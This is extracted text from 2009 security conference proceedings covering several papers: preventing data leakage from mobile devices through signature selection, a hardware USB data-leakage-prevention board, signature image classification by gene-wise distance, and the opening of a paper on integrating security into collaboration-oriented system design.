must be carefully monitored, and all of them should be managed safely in its device. But with the increase of capabilities of mobile device, it is still insufficient to properly handle the protecting action like PC’s security software. This paper introduces an approach how to prohibit illegal outflow from internal storage to external storage such as USB mass storage and SD/MD card. The main idea is that some feature value – what we call the signature - of sensitive information is extracted with sampling of equal distribution, and it is used to cut off illegal file transfer. This value is a byte stream in order to uniquely distinguish itself from among other files which they have user’s important data. At the moment of file transfer, every block of the data stream is inspected whether it has the signature. To get the signature, it is used that sampling method considering the number of signatures and computational overhead in this sampling. To compute the location and number of signature, it is needed to much computational overheads, so decision of the number is statically computed by looking up inference table. In Section 2 we explain other researches to protect or hide important information. In Section 3 we describe the considerations to select the signatures. In Section 4 we show how to get signature considering with these considerations such as the length of the signature, window size and window number. Finally, in Section 5 contains some concluding remarks.

2 Backgrounds Nowadays, the rapid proliferation of mobile devices and mobile networks has prompted the need to offer security for them[8,9]. Such as Personal Digital Assistants(PDAs), mobile phones(Smart Phone), laptops, and tablet personal computers(PCs) are classified as mobile devices. To compare non-mobile devices, it has several special properties include small size memory capability, using battery as a power, and etc[2,3]. In this environment, it must be considered above limitations to develop security functions of mobile device. There have been studies concerned specifically with security enhancement approaches of mobile device and of hiding information[9,10,11]. The approaches to protect outflow of user’s information, it is usually used signature detection as a inspection method[2,4,5]. There are two type of the signature. The first type of signature is special bytes calculated and generated by scanning whole messages such as CRC or MD5 hash value, and it will be attached to original message. The other type is subset bytes stream extracted from some part of whole message such as virus’s signature of vaccine program. To make a signature, it doesn’t need to make a transform on original message. But, if the location of extracting a signature would be predictable or if substitution of attached signature would be done simply, outflow detection would have been evaded easily. As an another approaches, for example, to protect for intellectual property from illegal file copy, the growing concern about the techniques for information hiding has been increasing. There are two general directions for information hiding: protection the detection of message such as steganography and hiding a message such as watermarking and fingerprinting[9,12,13]. But, these methods are required modification on original message to hide and to embed secrete message in it, and needed more computational overheads than signature method. Due to this, it is needed

The Design of Signature Selection for Protecting Illegal Outflow

53

an additional transform process from converted message to original message before using it. And, as computational overheads to get this, it is difficult to support as hardware limitations in mobile device. As describe above, security function must be have low overhead to protect important information of mobile device from illegal outflow of it. And the location of signature extraction should not be predictable.

3 The Strategy of Selection of Signature In this section we explain the concept behind sparse sampling to prevent illegal outflow. Please note that, if your email address is given in your paper, it will also be included in the meta data of the online version. 3.1 Considerations for Signature Selection Before looking more closely at dynamic selection of signature, it is necessary to consider that various parameters to extract and select signature. As described before, the location of signature within whole message must not be predictable and evasion of the signature detection must be restricted from doing various illegal operations on file which has important information. The main considerations are the location for signature selection and the number of selected signature. To avoid simple and easy prediction of signature, the location is determined by random sampling. To protect the signature from these operations, it should be selected in multiple position and number, but the number of the signature must be minimized as possible as small number. And, to extract the signature, the length of it carefully be chosen as appropriate extent to find it easily among files and to detect it in minimum byte comparison. But, the lesser the length of it, the signature’s uniqueness tends to be dwindled down. With the limitation of mobile device, usually small amount of files are located in it and it is apt to hold small size file. Due to small amount and size feature, we can choose the length and the number of signature as minimal as we can. In this case, we select only one signature in random location by predefined length. In a large size file, we must select more signatures than before in random location. To distinguish two cases, specific threshold value is used. Though this value is determined before the signature selection, it is adjusted dynamically according to increase of the iteration of the selection or access frequency for the file. When we select multiple signatures in a file, to encounter the evasion, signature selection based on binomial distribution is used. Doing this, evasion activities of unauthorized user will be properly precluded. 3.2 Considerations for Hardware Limitations At the moment of dynamic selection of signature, it is very important issue that the burdens to get the number and location of the signature. To get this, if it is needed to much time and computing power, so it is hard to be adapted to mobile device. To get multiple signature selection using binomial distribution method, it is needed highly

54

B.-h. Chung, M.-h. Han, and K.-y. Kim

time-consuming and complex mathematical operations such as calculation of radical number for real number over and over. In selecting a signature from file using binomial distribution, the number of signature is calculated and determined by each uniform amount of file extent - what is called window or window size. The number of the file extent is called as window number. The larger window number, the more complexity will be enlarged dramatically. Therefore, to reduce computational overhead on mobile device, the window number must be minimized as possible as. Moreover, to decrease mathematical and time complexity, calculation overhead for signature selection must be increased not exponentially but linearly as growing of the number. If the window number is predefined and fixed in advance, there is no need to calculate the number of signature at the time of every signature selection. But, due to the window number is dependent to file length and window size, it is difficult to predict the number before selection of file to extract signature. To avoid this unpredictability, in this paper, a reference table is used to get the number of signature. The reference table has been created as various window number in advance and stored into local storage of mobile device.

4 The Method of Signature Selection In this section, we shall see how these considerations are being unveiled. This section covers that how to decide the length of signature, window size and window number. And also, it will be described that the system architecture to implement and the procedure of signature detection. Fixing up the length of signature is very tough task, according to growth of the number of files, the length will be gradually enlarged to ensure signature’s correctness in order to pick out the correct file among others. In this approach, as a criterion of the length decision, the coefficient of signature collision is used. The collision is that an extracted signature may be identical to that of previously generated, and the coefficient value will be higher as this collision is flourished. Therefore, the collision carefully is monitored and the occurrence is accumulated for adjusting a coefficient. Initially this coefficient value is set up a half of the number of file as an integer value, it is substituted as a half of the previous one whenever the occurrence of collision exceeds the value. The initial length of signature is set as a length value of a few bytes, it is dependant to security policy. After set up, the time of adjusting for the coefficient, the length will be increased by one. The determination of window size is influenced by the length of the signature and the file. This size must be enough big to guarantee randomness of signature selection. If this size is too small, it can be easily predicted the location through a few trial of probabilistic estimation. The lager value is set up based on statistical experiment. The window number is automatically calculated through division file length by the window size. Because the increase of window number will cause burdens on mobile device, as described in previous section, the beginning window size is set as the average length of whole files in the device. The maximum value of window number is determined by security policy. If the window number of some file exceeds the maximum value, it is adjusted not to exceed the value. To do this, temporarily the window size changed to get proper value less than the maximum. There is another

The Design of Signature Selection for Protecting Illegal Outflow

55

case of change of the window size. In case, file access frequency or the level of importance of file is high, the window size will be changed into smaller than normal case. Or window size is not changed, and then the number of signature selection is increased. Signature selection is performed at file creation time in a mobile device. There are several cases of the file creation time: original file creation, copy from external device and creation from internal device. At that time, it is determined whether select signature or not according to security policy. Our strategies to decide it are done by keyword-based, by special directory-based and by manual file selection based. Keywords must be registered by device owner or administrator before file creation. Those have some text strings which are briefly described about important file. The special directory is set up like keyword-based case. This directory is always monitored carefully for file creation and all files in it must be done for signature selection. The last is that a user selects the file to extract signature. After signature selection step, a set of signatures is stored into internal memory of mobile device. When some file is copied into external storage, signatures of the set will be used to check existence of it in the content of the file. Comparison will be done by transferring block, those matched blocks are prohibited and the copy process is ceased. If matched, already transferred blocks must be erased.

5 Conclusions This paper proposed a dynamic signature selection to prevent illegal outflow from mobile device. This method is based on sampling by equal distribution, the signature was selected equally at each window unit for whole extent of the file. To do this, the whole extent was divided into some extents by window size and the length of signature was chosen the smallest one to distinguish the file among other files. Due to randomness of signature selection within window, unauthorized accesses of some part of the file was detected and protected efficiently. Window size was carefully decided to avoid extreme increase of the number of signature according to the distribution of file’s length in the mobile device. Also, to prevent excessive growth of the number of window, it would have been enlarged till threshold value. In signature extraction time, runtime complex operations to calculate the number of signature selected were removed using look-up operation of pre-calculated table. With the help of randomness and equal distribution of signature selection, the exact transferring block which has sensitive information will be correctly blocked. Decision strategy of the length and number of window, signatures can be minimized to manage. With the reduction of runtime computational overhead, it can be done using low performance device than PC. Finally, a benefit of the proposed method, it is possible to use it as prevention mechanism in mobile device with low performance. We are planning to further extend this functionality, in order to reduce the burden to mobile device, such as minimum selection. And it will be also studied that the decision of file of signature extraction can be done automatically.

56

B.-h. Chung, M.-h. Han, and K.-y. Kim

References 1. Smith, T.F., Waterman, M.S.: Identification of Common Molecular Subsequences. J. Mol. Biol. 147, 195–197 (1981) 2. Shi, Z., Ji, Z., Hu, M.: A Novel Distributed Intrusion Detection Model Based on Mobile Agent. In: ACM InfoSecu 2004, pp. 155–159 (2006) 3. Yong-guang, Z., Wenke, L., Yi-an, H.: Intrusion Detection Technique for Mobile Wireless Networks. In: ACM MONET, pp. 545–556 (2003) 4. Deepak, V.: An Efficient Signature Representation and Matching Method for Mobile Devices. In: Proceedings of the 2nd annual international workshop on Wireless internet, vol. 220 (2006) 5. Geetha, R., Delbert, H.: A P2P Intrusion Detection System based on Mobile Agents. In: ACM ACME 2004, pp. 185–195 (2004) 6. National Center for Biotechnology Information, http://www.ncbi.nlm.nih.gov 7. Yogesh Prem, S., Hannes, T.: Protecting Mobile Devices from TCP Flooding Attacks. In: ACM mobiArch 2006, pp. 63–68 (2006) 8. Benjamin, H.: Mobile Device Security. In: ACM InfoSecCD Conference 2004, pp. 99–101 (2004) 9. Ingemar, J., Ton, K., Georg, P., Mathias, S.: Information Transmission and Steganography. In: Barni, M., Cox, I., Kalker, T., Kim, H.-J. (eds.) IWDW 2005. LNCS, vol. 3710, pp. 15–29. Springer, Heidelberg (2005) 10. David, C., Sebastian, H., Pasquale, M.: Quantitative Analysis of the Leakage of Confidential Data. Electronic Notes in Theoretical Computer Science 59(3) (2003) 11. Christian, C.: An Information-Theoretic Model for Steganography. In: Aucsmith, D. (ed.) IH 1998. LNCS, vol. 1525, pp. 306–318. Springer, Heidelberg (1998) 12. Dan, B., James, S.: Collusion-Secure Fingerprinting for Digital Data. IEEE Transactions on Information Theory 44(5) (September 1998)

Hardware Based Data Inspection for USB Data Leakage Prevention DongHo Kang, BoHeung Jung, and KiYoung Kim Infra Protection Research Team, Electronics and Telecommunications Research Institute Daejeon, Korea {dhkang, bhjung, kykim}@etri.re.kr

Abstract. The current Internet threat environment is characterized by an increase in data theft, data leakage, and the creation of targeted, malicious code for the purpose of stealing confidential information that can be used for financial gain. This paper focuses on protecting sensitive files from getting accidently leaked out of a system through unauthorized USB devices. We propose a hardware architecture guaranteeing USB-based data leakage prevention. The prototype board connected to a USB host system intercepts and analyzes USB data transferred to a USB device. This approach provides flexible security enforcement policies including alerting and real-time blocking. Keywords: Data leakage Prevention, Security, Confidentiality, USB.

1 Introduction We are faced with the data leakage problem arising from data transfer using wired USB connectivity. USB creates a method of attaching and accessing peripheral devices that reduces overall cost, simplifies the attachment and configuration from the end-user perspective, and solves several technical issues associated with old style peripherals. However, it can also be a tremendous source of data leakage from uncontrolled access. USB host devices can transfer their sensitive data through USB interfaces. In examples, they can copy data from their hard drive to a CD/DVD burning device or a USB storage device. and, A wireless USB network dongle enables notebooks and Desktops to communicate wirelessly with other devices through a USB interface. We can print from a host system to a printer using a USB interface. For those reasons, USB connectivity on notebooks, desktops increases the risk of data leakage through USB data transfers. USB data leakage prevention technologies have existed for some time now. For instance, USB monitoring tools running on a host device are developed. They inspect their USB data transferred to others USB client devices and control their USB drive insertion and removal activities. Other tools provide data encryption for preserving D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 57–63, 2009. © Springer-Verlag Berlin Heidelberg 2009

58

D. Kang, B. Jung, and K. Kim

important data. In theory, a host system is secure, if all necessary DLP mechanisms are in place. In reality, however, those technologies may not completely prevent data leakage criminal by inside intruders. And, Most of those tools spend limited resources on a system. A DLP solution should be fast enough to catch different types of data leakage before data is lost. This research provides a unique framework for preserving sensitive data on a USB host system. And, The FPGA based DLP board also brings the resource-saving and the speed-enhanced benefits comparison on to USB monitoring tools running on a host device.

2 Architecture The USB DLP architecture with two components is shown in Figure 1. The architecture consists of the host system running a USB DLP application and has sensitive data, and the USB DLP board that analyzes USB data. The host system connects the USB DLP board with the USB interface. The USB DLP board is located between the host system and USB Devices such as a USB Memory device, a USB Network dongle, a USB CD/DVD Burner and, a USB printer. The FPGA based board is designed for string comparison using hash based pattern matching algorithm. The proposed architecture consists of Signature manager on the host system and the USB DLP board. Signature manager is software executing on the host system that generates signatures and enforces them on the USB DLP board. The USB DLP board is responsible for receiving USB data from the host system, parsing and analyzing data, and then determines whether data is sensitive. if it is not sensitive, The USB DLP board transfers data to a USB device.

Fig. 1. The USB DLP Architecture

Hardware Based Data Inspection for USB Data Leakage Prevention

59

3 Design As described in the introduction, the proposed architecture provides a unique approach for protecting sensitive or confidential data on a system that increases the risk of data leakage through uncontrolled USB data transfers. The Host system provides two interfaces. Policy is transferred to USB DLP board through serial port. A USB port is interface for USB data transmission. The architecture consists of signature management application on the host system that has the preserved data and USB DLP board.

Fig. 2. The USB DLP Structure

3.1 Signature Management Application Signature Management application consists of Signature manager, pattern sampler, Signature distributer for signature generation, enforcement, and event recoder for handling alert messages. Signature manager receives the list of sensitive files through a GUI. For signature generation signature manager extracts only multiple strings from all text in each sensitive file. The size of the extracted string is defined as 8byte, 16byte, 24byte units for pattern matching engine on the FPGA. What part of a file has to be extracted is defined by GUI. To enforce security policy in hardware, Signature management application has to proceed in three steps. First, 16byte-Signature or 24byte-Signature divides into 8byte unit. The next step, using 8byte string a hash function generates memory address to store 8byte string in the signature memory. The hash function performs XOR operation to easy and fast to calculate. The following shows the example of the hash function. H = ((Cn << n-1) + (Cn-1 << n-2) + … + (C2 << 1) + C1) << 3 If hash collision is occurred, Signature manager regenerates a signature from a file until collision is free. The last step, signature distributer transfers the policy file including the list of the extracted signature to USB DLP Board through a serial port.

60

D. Kang, B. Jung, and K. Kim

Fig. 3. The Hash function

Eventually the extracted signature from a sensitive file is placed in the signature memory on the FPGA Chip. The security mechanism uses a policy file to determine whether to pass or drop a USB Data on the USB DLP Board. a policy file consists of a set of rules, where a rule is composed of the memory address for storing signature, signature, signature length, and action to be performed by USB DLP Board when USB data is sensitive. 3.2 USB DLP Board The USB DLP board is designed for wire-speed data forwarding and data analysis to prevent data leakage. It has three interfaces: Two USB interfaces for USB data transmission and an Ethernet interface for Policy and alert message transmission. The

Fig. 4. Search Engine Block

Hardware Based Data Inspection for USB Data Leakage Prevention

61

FPGA chip receives USB data through a USB port and a UTMI transceiver. If USB data is not sensitive, it is transferred to a USB device attached USB DLP Board. Search Engine Block (SEB) on the FPGA Chip determines whether data is confidential or not. SEB is composed of 3 Block RAMs. RAMB1 is the memory with 4096 entries for storing 8byte signatures. RAMB2 is the memory with 4096 entries for policies. And FIFO memory is to check whether the next 8byte string is matched in a row after the first or second 8-byte USB data and 8-byte signature match. The following shows how to store 32byte string in RAMB1, RAMB2 memory.

Fig. 5. Policy Enforcement

SEB performs string comparison using the Rabin-Karp based algorithm. In a preprocessing phase, Hash Function Block (HFB) performs the hash value calculation about the incoming 8byte-data to the unit of byte. In case of 16-byte or 24byte pattern if the string in incoming data is matched with signature in memory pointed by the calculated hash value, SEB checks out whether the next patterns is matched or not. If all reconstructed patterns are matched with incoming data, an alert message is generated according to the related policy in RAMB2.

4 Implementation We have developed the USB DLP Prototype. The USB DLP board is based on a Virtex-5 FPGA and has a PowerPC 440 RISC CPU. FPGA Logic of USB DLP Board is implemented in verilog HDL that is best suited for wire-speed data processing. Also, we employed inline mode for effective response. The USB DLP board intercepts USD data and filters out sensitive data before they reach a USB device.

62

D. Kang, B. Jung, and K. Kim

Fig. 6. USB DLP Prototype

5 Conclusion In this paper, we designed the USB DLP architecture that performs the wire-speed data processing and data leakage prevention, and implemented the prototype in FPGA-based reconfiguring hardware that supports more efficient prevention. It has the advantage that is capable of supporting the effective response by using inline mode monitoring technique. However, it is difficult to create the USB DLP architecture that prevents all possible types of USB data leakage. To develop a better system, the current prototype requires automatic data classification technique for accurately signature extraction. And, we need more experimentation in a real environment for resolving problems derived from the verification of implemented system.

References [1] Anderson, D., Dzatko, D.: Universal Serial Bus System Architecture, 2nd edn. AddisonWesley, Reading (2001) [2] Maier, G.M.: Hardware Pattern Matching for Network Traffic Analysis in Gigabit Environments. Diplomarbeit in Informatik, Technische Universität Munchen (May 2007) [3] Jacoby, G.A., Mosly, S.: Mobile Secuirty Using Separated Deep Packet Inspection. In: IEEE CCNC (2008) [4] song, H., Dharmapurikar, S., Turner, J., Lockwood, J.: Fast Hash Table Lookup Using Extended Bloom Filter: An Aid to Network Processing. In: SIGCOMM (August 2005)

Hardware Based Data Inspection for USB Data Leakage Prevention

63

[5] IDC, Information Protection and Control Survey: Data Loss Prevention and Encryption Trends, Doc #211109 (March 2008) [6] SOPHOS, White Paper Stopping data leakage: Exploiting your existing security investment (June 2008) [7] XILINX Inc., Virtext-5 FPGA User Guide (March 2008)

Grayscale Image Classification Using Supervised Chromosome Clustering Debnath Bhattacharyya1, Poulami Das1, Samir Kumar Bandyopadhyay2, and Tai-hoon Kim3 1

Computer Science and Engineering Department, Heritage Institute of Technology, Kolkata, India {debnathb,dasp88}@gmail.com 2 Department of Computer Science and Engineering, University of Calcutta, Kolkata, India [email protected] 3 Hannam University, Daejeon-306791, Republic of Korea [email protected]

Abstract. In this paper we propose Handwritten Signature Classification using supervised chromosome clustering technique. Due to the time variant nature of handwriting of human being, a set of hundred sample Handwritten Signatures first collected from the user or individual in form of same sized grayscale images. These grayscale handwritten signature images will be used as the training set in our classification algorithm. Our propose algorithm will then decide whether the future incoming handwritten signature of an individual can be a member of the training set or not. In this paper, distance and similarities play an important role, where the greater the dissimilarity measure or distance of genes, the more dissimilar are the two chromosomes. Keywords: Clustering, pattern recognition, grayscale, chromosome and genes.

1 Introduction In general, we are considering the cluster, class or group analysis here in this paper. In cluster analysis [1], the terms cluster, group, and class have been used in an essentially intuitive manner without a uniform definition. Everitt suggested [2] that if using a term such as cluster produces an answer of value to the investigators, then it is all that is required. Generally, the common sense of a cluster will combine various plausible criteria and require [3], for example, all objects in a cluster to a. share the same or closely related properties; b. show small mutual distances or dissimilarities; c. have “contacts” or “relations” with at least one other object in the group; or D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 64–71, 2009. © Springer-Verlag Berlin Heidelberg 2009

Grayscale Image Classification Using Supervised Chromosome Clustering

65

d. be clearly distinguishable from the complement, i.e., the rest of the objects in the data set. Carmichael et al. also suggested [4] that the set contain clusters of points if the distribution of the points meets the following conditions: a. There are continuous and relative densely populated regions of the space. b. These are surrounded by continuous and relatively empty regions of the space. But, in reality, the above two conditions or rules violet frequently. Data clustering (or just clustering), also called cluster analysis, segmentation analysis, taxonomy analysis, or unsupervised classification, is a method of creating groups of objects, or clusters, in such a way that objects in one cluster are very similar and objects in different clusters are quite distinct. Data clustering is often confused with classification, in which objects are assigned to predefined classes. In data clustering, the classes are also to be defined [1]. To elaborate the concept a little bit, we consider the following example: A gene expression data set can be represented by a real-valued expression matrix

where n is the number of genes, d is the number of experimental conditions or samples, and xij is the measured expression level of gene i in sample j. Since the original gene expression matrix contains noise, missing values, and systematic variations, preprocessing is normally required before cluster analysis can be performed. We are considering lossless grayscale images to avoid noise to some extent, however, the noise removal is a separate problem altogether. Gene expression data can be clustered in two ways. One way is to group genes with similar expression patterns, i.e., clustering the rows of the expression matrix D. Another way is to group different samples on the basis of corresponding expression profiles that is, clustering the columns of the expression matrix D. Image segmentation is the decomposition of a gray level or color image into homogeneous tiles [5]. In image segmentation, cluster analysis is used to detect borders of objects in an image. Clustering constitutes an essential component of so-called data mining, a process of exploring and analyzing large amounts of data in order to discover useful information [6]. Clustering is also a fundamental problem in the literature of pattern recognition. Fig. 1 gives a schematic list of various data-mining tasks and indicates the role of clustering in data mining.

66

D. Bhattacharyya et al.

Fig. 1. Data-mining tasks

2 Previous Works The clustering problem has been addressed extensively, although there is no uniform definition for data clustering and there may never be one [7, 8, 9]. Roughly speaking, by data clustering, we mean that for a given set of data points and a similarity measure, we regroup the data such that data points in the same group are similar and data points in different groups are dissimilar. Obviously, this type of problem is encountered in many applications, such as text mining, gene expressions, customer segmentations, and image processing, to name just a few. As a fundamental pattern recognition problem, a well-designed clustering

Fig. 2. Process of data clustering

Grayscale Image Classification Using Supervised Chromosome Clustering

67

algorithm usually involves the following four design phases: data representation, modeling, optimization, and validation [16]. Fig. 2 shows the schematic diagram of those design phases. A new genetic search strategy involving chromosome differentiation into two classes and a restricted form of crossover operation is defined [10]. Its application to multi- dimensional pattern recognition problems is studied. Superiority of the classifier is established for four sets of different artificial and real life data. The concept of chromosome differentiation, commonly witnessed in nature as male and female sexes, is incorporated in genetic algorithms with variable length strings for designing a nonparametric classification methodology. Its significance in partitioning different landcover regions from satellite images, having complex/overlapping class boundaries, is demonstrated. The classifier is able to evolve automatically the appropriate number of hyperplanes efficiently for modeling any kind of class boundaries optimally. Merits of the system over the related ones are established through the use of several quantitative measures [11].

3 Our Work In this paper we propose the distance based classifier algorithm, which will classify a handwritten signature image. For that, at first we have taken a set of handwritten signature images after properly processed. Input: N-Training Image(s), 1-Test Image Output: Test Image, FIT or UNFIT Procedure HSC() [Handwritten Signature Classifier] { 1. Declare N number of 2D Training Arrays and one 2D Test Array with size (w, h), where w = width and h = height of each of the images (image size is same for all images) Declare single dimensional vector array x1, x2, …, xn each of size (k = w x h), where n is the number of training images and one test vector array, y(w x h). 2. For i = 1 to w For j = 1 to h Read pixel (i, j) from each images and assign gray value for each pixel to the corresponding 2D Training Arrays Read Test_image_pixel (i, j) from Test image and assign gray values to 2D Test Array End For End For 3. For i = 1 to w For j = 1 to h

68

D. Bhattacharyya et al.

Populate each Single Dimensional vector array from the corresponding 2D Training Arrays, x1(1…k), …., xn (1…k), populate y(1…k)from 2D Test Array End For End For 4. Fitness of y(1…k), J is the number of x arrays For i = 1 to k

Di ( X , Y ) =

∑ (x

− yi )

2

ji

If Di ( X , Y ) == 0 then test image (Signature of User) is under the user domain. Else Test image not matched, (Unauthorized User) End for

} All the grayscale training images are scaled into specific and same size [12]. Pass the images through the thinning algorithm [13]. Then get the each pixel value and store into the corresponding location of the training 2D array for all the images. So, N number of 2D Arrays will be generated. Convert these 2D Arrays to single dimensional arrays. Now, we can consider each single dimensional array as a chromosome, where each element of the array holds specific characteristic and can be treated as a gene responsible for the character (colour) that is, gray colour intensity value can be 0 to 255. In human beings, so far 32000 genes have been identified. Thus in a large problem space a huge number of pixels needed to be handle. Time complexity for 1:1 checking will be O(N3), in large problem space. Bit slow, but the algorithms will give output in polynomial time. This is very common, because, algorithm(s) have to handle large sets of image data [14]. Fitness test for the test image is as follow:

where, x and y are the single dimensional arrays. Distance (d) between x and y is calculated. If there is no measure of similarity or dissimilarity between pairs of data points, then no meaningful cluster analysis is possible.

4 Result Result of a test run is shown in Table 1, Table 2 and Table 3. Distance value is calculated with each of training chromosome and test chromosome gene to

Grayscale Image Classification Using Supervised Chromosome Clustering

69

Table 1. Test Chromosome

1 255

Test Chromosome

2 0

3 255

4 255

5 0

6 0

Genes 7 8 255 0

9 255

10 0

11 0

12 255

Table 2. A set Training Chromosomes (user domain)

Training Chromosome # 1 2 3 4 5

1

2

3

4

5

Genes 6 7

8

9

10

11

12

0 255 255 0 255

255 0 0 0 0

255 255 255 255 255

0 0 255 255 255

0 0 0 0 255

0 0 0 0 0

0 0 0 0 0

255 255 255 255 255

0 0 0 0 0

0 0 0 0 0

255 255 255 255 255

255 255 255 255 255

Table 3. Result set Training Chromosome # 1 2 3 4 5

1

2

3

4

5

0 255 255 0 255

255 0 0 0 0

255 255 255 255 255

0 0 255 255 255

0 0 0 0 255

Genes 6 7

8

9

10

11

12

Distance values

0 0 0 0 0

0 0 0 0 0

255 255 255 255 255

0 0 0 0 0

0 0 0 0 0

255 255 255 255 255

441.67 255 0 255 255

255 255 255 255 255

gene, Table 3. In this example, training Chromosome 3 is completely matched with test chromosome, where distance value is ‘0’, the highest or complete match with a ‘0’ membership value, higher distance value means less fit membership value. Figurative analysis is shown in Fig. 3. Initially, N numbers of training images are taken. Then output is shown step-wise. Following rules have been applied for this work:

D ( X , Y ) ≥ 0 -------------b. D ( X , X ) = 0 ------------c. D (Y , Y ) = 0 ---------------

a.

where, in equations (i), (ii) and (iii), D=Distance, X and Y are chromosomes.

(i) (ii) (iii)

70

D. Bhattacharyya et al. N number of Grayscale Training Images

Signature-1

Signature-2

Signature-(N-1)

Signature-N

Image to 2D Training Array 0 0 0 0 0 0

0 0 0 0 0 0

0 0 0 255 255 0

0 255 255 255 255 0

0 255 255 255 255 0

0 255 255 255 255 0

0 255 255 255 255 0

0 255 255 255 255 0

0 255 255 255 255 0

0 255 255 255 255 0

0 255 255 255 255 0

0 255 255 255 255 0

0 255 255 255 0 0

0 255 255 255 0 0

0 0 0 255 0 0

0 0 0 0 0 0

2D Training Array to Single Dimensional Array (Chromosome) 0

0

--------

255

255

255

------

255

255

----

0

0

255

----

0

0

Gene to gene distance calculation Test Chromosome 0

0

-------0

255

255

255

------

255

Calculated Distance (Highest Fitness here in this example)

Fig. 3. One such instance of algorithm output

5 Conclusion A new approach, gene to gene differentiation in between chromosomes has been described. Its related application also developed and tested here in this paper. Pattern classification in a large space has been tested also. An improvement also marked in compare to the proposed works [15]. We have started to incorporate some fuzzy rules in this algorithm.

Acknowledgement This work was supported by the Security Engineering Research Center, granted by the Korea Ministry of Knowledge Economy. This work has successfully completed by the active support of Prof. Tai-hoon Kim, Hannam University, Republic of Korea.

References 1. Gan, G., Ma, C., Wo, J.: Data Clustering: Theory, Algorithms and Applications. In: ASA-SIAM Series on Statistics and Applied Probability. SIAM, Philadelphia (2007) 2. Everitt, B.: Cluster analysis, 3rd edn. Halsted Press, New York (1993)

Grayscale Image Classification Using Supervised Chromosome Clustering

71

3. Bock, H.: Probabilistic aspects in cluster analysis. In: Conceptual and Numerical Analysis of Data, Augsburg, FRG, pp. 12–44. Springer, Heidelberg (1989) 4. Carmichael, J., George, J.A., Julius, R.: Finding natural clusters. Systematic Zoology 17(2), 144–150 (1968) 5. Comaniciu, D., Meer, P.: Mean shift: A robust approach toward feature space analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence 24(5), 603–619 (2002) 6. Berry, M., Linoff, G.: Mastering Data Mining. John Wiley and Sons, New York (2000) 7. Estivill-Castro, V.: Why so many clustering algorithms: a position paper. ACM SIGKDD Explorations Newsletter 4(1), 65–75 (2002) 8. Dubes, R.: How many clusters are best? An experiment. Pattern Recognition 20(6), 645– 663 (1987) 9. Fraley, C., Raftery, A.: How many clusters? Which clustering method? Answers via model-based cluster analysis. The Computer Journal 41(8), 578–588 (1998) 10. Bandyopadhyay, S., Pal, S.K.: Pattern Classification with Genetic Algorithms: Incorporation of Chromosome Differentiation. Pattern Recognition Letters 18, 119–131 (1997) 11. Bandyopadhyay, S., Pal, S.K.: Pixel Classification Using Variable String Genetic Algorithms with Chromosome Differentiation. IEEE Transactions on Geoscience and Remote Sensing 39(2), 303–308 (2001) 12. Bhattacharyya, D., Bandyopadhyay, S.K., Chaudhury, D.: Handwritten Signature Authentication Scheme using Integrated Statistical Analysis of Bi-Color Images. In: IEEE ICCSA 2007 Conference, Kuala Lumpur, Malaysia, August 26-29, pp. 72–77 (2007) 13. Bandyopadhyay, S.K., Bhattacharyya, D., Das, P.: Handwritten Signature Verification System using Morphological Image Analysis. In: CATA 2007 International Conference, A publication of International Society for Computers and their Applications, Honolulu, Hawaii, USA, March 28-30, pp. 112–117 (2007) 14. Bandyopadhyay, S.K., Bhattacharyya, D., Das, P., Debnath, D.: Handwritten Signature Authentication using Statistical Estimation. In: IEEE-CS MUE 2008 Conference, Busan, Korea, April 24-27, pp. 77–82 (2008) 15. Das, P., Bhattacharyya, D., Bandyopadhyay, S.K., Kim, T.-h.: Person Identification through IRIS Recognition. IJSIA - International Journal of Security and Its Applications, A publication of Science and Engineering Research Support Center 3(1), 129–148 (2009) 16. Buhmann, J.: Data clustering and learning. The Handbook of Brain Theory and Neural Networks, pp. 308–312. MIT Press, Cambridge (2003)

Towards the Integration of Security Aspects into System Development Using Collaboration-Oriented Models Linda Ariani Gunawan, Peter Herrmann, and Frank Alexander Kraemer Department of Telematics Norwegian University of Science and Technology (NTNU) Trondheim, Norway {gunawan,herrmann,kraemer}@item.ntnu.no

Abstract. Security, as an important feature of system design, should be taken into account early in the development of systems. We propose an extension of the SPACE engineering method in order to integrate security aspects into the system design and implementation phases. The integration of security mechanisms is facilitated by collaborations. Functional system specifications are represented by collaboration-oriented models which describe functionalities reaching over different physical components in one model. Countermeasures are also modeled by collaborations since security mechanisms are often collaborative structures themselves. Our approach includes an asset-oriented security analysis on the collaboration-oriented models in order to determine the level of protection needed. We illustrate our approach by the example of an e-sale system.

1

Introduction

Developing security-aware distributed systems is a non-trivial task: Not only do we have to guarantee the correct execution of a system provided by cooperating distributed entities with respect to the desired functionalities of the application. We must also take into account the protection of the system against security attacks by malicious entities. The consideration of these security aspects should be integrated as early as possible into the development process, since adding security later in an ad-hoc manner increases the probability to overlook vulnerabilities contained in the system implementation [1]. For that reason, we propose a model-driven, security-aware development method based on collaborative, reusable building blocks. Application logic as well as security mechanisms are expressed by means of functionally complete UML models that can be analyzed in separation. Once consistent and adequately protected, these models can be stored as building blocks in a library. This not only reduces the development time, since proven solutions can be reused, but also facilitates the cooperation between application developers and security experts, since both parties contribute their knowledge in the form of self-contained, encapsulated units that are easy to combine, as shown in [2] for the domain of trusted systems. ´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 72–85, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

Towards the Integration of Security Aspects into System Development

73

Our proposed method is an extension of the engineering method SPACE [3,4,5] that supports the design and implementation of reactive systems in general. In this method, system specifications are expressed in the form of UML 2.x activities, enabling the composition of systems by reusable building blocks. By means of model transformation and code generation, the composed system specifications can be implemented automatically, so that engineers only have to work on the level of UML activities. We extend the SPACE method by performing a series of iterated steps of security analysis which adheres to the standard ISO/IEC Common Criteria [6]. During the analysis, security threats, attacks and risks are considered in order to design suitable protection mechanisms and integrate them into the functional specification of the system. To be effective, most security mechanisms require the correct and coordinated collaboration of several entities. For instance, an asynchronous encryption mechanism consists at least of a transmitter encrypting a message with the public key of the receiver and the receiver itself, that decrypts the message with the corresponding private key. Furthermore, entities like a certification authority issuing certificates that a public key really belongs to a certain party are part of the security mechanism as well. For that reason, we also use collaboration models to specify countermeasures. The different stakeholders of security mechanisms and their corresponding behaviors may be expressed by UML activities which can easily be combined with other collaboration models describing the systems to be protected.

2

The Basic Development Method

